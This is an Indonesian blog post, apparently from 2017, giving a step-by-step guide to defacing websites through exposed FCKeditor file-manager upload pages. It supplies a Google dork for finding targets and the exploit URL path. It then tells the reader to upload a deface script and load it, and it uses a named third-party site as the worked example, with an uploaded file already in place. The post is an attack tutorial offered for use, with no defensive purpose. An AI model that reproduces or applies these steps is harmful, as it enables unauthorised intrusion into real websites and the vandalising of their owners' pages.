Kamis, 21 Desember 2017

Cara Deface Menggunakan Teknik FCKeditor


Dork : 
 inurl:advert_detail.php?id=
Kembangin lagi biar dapet yang vuln

Exploit : 
 /admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

1. Masukan dork diatas ke pencarian google

2. Pilih salah satu web target


3. Masukan exploit diatas ke akhir url target
    contoh : http://kralgayrimenkul.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

4. Jika sudah, nanti akan dialhkan ke halaman upload files


5. Klik browse, cari file script deface kalian, kemudian klik upload
 

6. Jika file ter upload, tinggal panggil script deface kalian dengan cara www.target.com/files/namacslu.html
    sebagai contoh : http://kralgayrimenkul.com/files/hallucination.html



Disqus Comments